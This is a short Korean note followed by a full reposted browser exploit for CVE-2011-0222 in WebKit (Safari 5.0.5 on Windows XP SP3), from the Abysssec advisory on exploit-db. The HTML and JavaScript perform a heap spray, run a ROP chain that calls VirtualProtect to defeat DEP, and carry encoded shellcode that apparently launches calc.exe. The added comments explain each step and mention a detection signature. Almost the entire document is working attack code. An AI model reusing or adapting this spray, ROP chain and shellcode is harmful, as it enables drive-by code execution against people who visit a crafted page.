악성코드 유포에 이용될 수도 있을 거 같아 기록해 둡니다.
http://www.exploit-db.com/exploits/17575/
<html>
<head>
<script>
/*
Abysssec Public Advisory
apple killed one of our 0day no point to keep it private anymore :(
there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to bypass it and stand alone module .
this exploiting using ROP to bypass permanent DEP.
note : Change spray range if not work on your machine.
CVE-2011-0222 :
WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash)
via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
Tested on windows XP SP3 and safari 5.0.5
feel free to contact us at : info [at] abysssec.com
and follow @abysssec for updates
*/
// Declared by the original author but never referenced anywhere in this listing.
var cur_id;
// Property names crash() is allowed to follow. Read in order they appear to form the
// SVG DOM path document -> rootElement -> preserveAspectRatio -> baseVal -> align;
// presumably that repeated traversal is what trips CVE-2011-0222, but the listing does
// not show which step actually faults. Values are 1 so the lookup in crash() can use `!= 1`.
var object_whiteList = {'document':1, 'rootElement':1, 'preserveAspectRatio':1,'baseVal':1, 'align':1 };
// Walk `target` recursively, but only through the properties named in object_whiteList.
// Called on every other event_loop() tick with the opened SVG window (t1). There is no
// cycle guard: termination relies on the whitelisted chain ending at a non-object
// (`align`) — TODO confirm against the SVG DOM.
// Detection angle: a page that re-walks the same DOM path on a 10 ms timer, interleaved
// with large unescape()-built strings, is the behavioural signature of this listing.
function crash(target)
{
var members = [];
// Snapshot every enumerable property name first (for...in over a host object).
for (var name in target) members.push(name);
// for...in over an array: `num` is the string index, not the element.
for (var num in members)
{
// Same function-scope `name` as the loop above (var hoisting); it is simply reused.
var name = members[num];
// Skip anything not whitelisted; `!= 1` also skips inherited keys such as `constructor`.
if(object_whiteList[name] != 1)
continue;
var cur_value = null;
// eval on a string built from the property name — functionally target[name]. Kept verbatim:
// the allocation/GC behaviour of this proof of concept is timing-sensitive.
cur_value = eval('target.' + name);
// Descend only into object-valued properties (a null value would also satisfy typeof,
// but the whitelisted names are not expected to be null — TODO confirm).
if (typeof cur_value == 'object' )
crash(cur_value);
}
};
// Allocate 10,000 short-lived String objects to pressure the engine's garbage collector
// before the spray (the name says "gc"; the listing gives no other purpose). Each
// iteration assigns the latest one to `gc_string`, which is never declared with var
// anywhere in this file and therefore becomes an implicit global; the eval is just how
// the author writes that assignment.
function toggle_gc() {
for (var i = 0; i < 10000; i++) {
// `new String(...)` creates a wrapper object, not a primitive; Math.random() keeps each distinct.
var s = new String("AAAA" + Math.random());
eval("gc_string = s");
}
}
// Heap spray: build one string of `size` bytes (JS strings are UTF-16, hence size / 2
// code units — the byte interpretation of `size` is inferred from that division) starting
// with `payload` and padded with 0x4545 units, then allocate `n` further copies of it.
// The absolute addresses in the caller's payload assume where these copies land, which is
// the fragility behind the advisory's "change spray range" note and what ASLR removes.
// `h1` is local, so the copies are only rooted for the duration of the call; presumably
// what matters is the allocator state left behind — confirm.
function spray(size, n, payload)
{
var string_size = size / 2;
var str = payload;
// Two UTF-16 units of 0x4545 as filler.
var c = unescape('%u4545%u4545');
while (str.length < string_size)
str += c;
var h1 = [];
// Trim to exactly string_size units (padding can overshoot by one unit; a payload longer
// than string_size is silently truncated here).
h1[0] = str.substring(0, string_size)
// `i` is never declared: implicit global loop counter (non-strict script).
// unescape() on a string with no %-sequences yields an equal string; presumably used to
// force a fresh allocation per copy instead of sharing h1[0]'s buffer — engine-specific, confirm.
for( i = 1; i <= n; i++)
h1[i] = unescape(h1[0])
};
// Handle to the window opened on target.svg by run_tests(); crash() walks it.
var t1;
// 0/1 toggle read and flipped by event_loop() to alternate crash() and spray().
var state = 0;
// Self-rescheduling 10 ms timer that is never cleared: on state 0 walk the SVG window
// (crash), on state 1 do a small spray of 5,000 x 32-byte strings seeded with the
// little-endian value 0x7fc00004 — the same 0x7fc0xxxx range the ROP chain in run_tests()
// points into, presumably an address inside the large spray (confirm).
// setTimeout with a string argument is an eval form.
function event_loop()
{
if(state == 0)
crash( t1);
else
{ var payload = unescape('%u0004%u7fc0');
spray(32, 5000, payload);
}
// Flip between 0 and 1.
state = (state + 1) % 2;
setTimeout('event_loop()', 10);
}
// Entry point (body onload). Order: GC churn, build the ROP chain + second-stage string,
// one large spray, open target.svg in a named window, then start event_loop() after 1 s.
// Every gadget address in the chain is absolute (0x7c8xxxxx / 0x7c9xxxxx / 0x7642xxxx);
// that they are valid at all presumes the non-relocated system DLLs of the advisory's
// stated XP SP3 / Safari 5.0.5 test platform (inferred from the header, not shown here),
// which is exactly what ASLR and per-build DLL differences defeat. The VirtualProtect call
// with permission 0x40 (PAGE_EXECUTE_READWRITE) is the DEP bypass the header refers to.
// The 0x7fc0xxxx values are presumably pointers into the sprayed region — confirm.
function run_tests()
{
toggle_gc();
// Each '%uXXXX%uYYYY' pair is one little-endian 32-bit value; the author's gadget labels follow.
var payload = unescape('%u0004%u7fc0%u000c%u7fc0'
+ '%uB1C1%u7C9F' // mov esp, [ecx] | some instruction | ret (stackPivot)
+ '%u0010%u7fc0%u4242%u4242'
+ '%uD53A%u7C96' // pop ecx | ret
+ '%u1AD4%u7C80' // virtualProtect
+ '%u29D2%u7C83' // mov eax, ecx | ret
+ '%u99DE%u7642' // call eax | pop ecx | ret
+ '%u003c%u7fc0' // shellcode Address
+ '%u2000%u0000' // size
+ '%u0040%u0000' // permission
+ '%u0034%u7fc0'
+ '%u6666%u6666'
+ '%u003c%u7fc0');
// Second stage: begins with 0x90 (NOP) bytes; the units near the end decode to the ASCII
// string "calc.exe" when read as little-endian bytes, consistent with a launch-calculator
// proof of concept — verify by decoding rather than trusting this note.
var shellcode = unescape("%u9090%u8166%ufce4%u31ff%u56f6%u8b64%u3076%u768b%u8b0c%u1c76%u6e8b%u8b08%u8b36%u3c5d%u5c8b%u781d%ueb01%u4b8b%u6718%uece3%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucc75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ff");
payload += shellcode;
// 20,000 copies of 300-byte strings: the main spray the chain's 0x7fc0xxxx pointers rely on.
spray(300,20000, payload);
// Load the (empty) SVG document in a new window; crash() walks it through t1.
t1 = window.open('target.svg', 't1');
// String-argument setTimeout (eval form); one-shot here, event_loop reschedules itself.
setTimeout('event_loop()', 1000);
}
</script>
</head>
<body onload="run_tests()">
<svg></svg>
</body>
</html>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100%" height="100%" version="1.1" xmlns="http://www.w3.org/2000/svg">
</svg>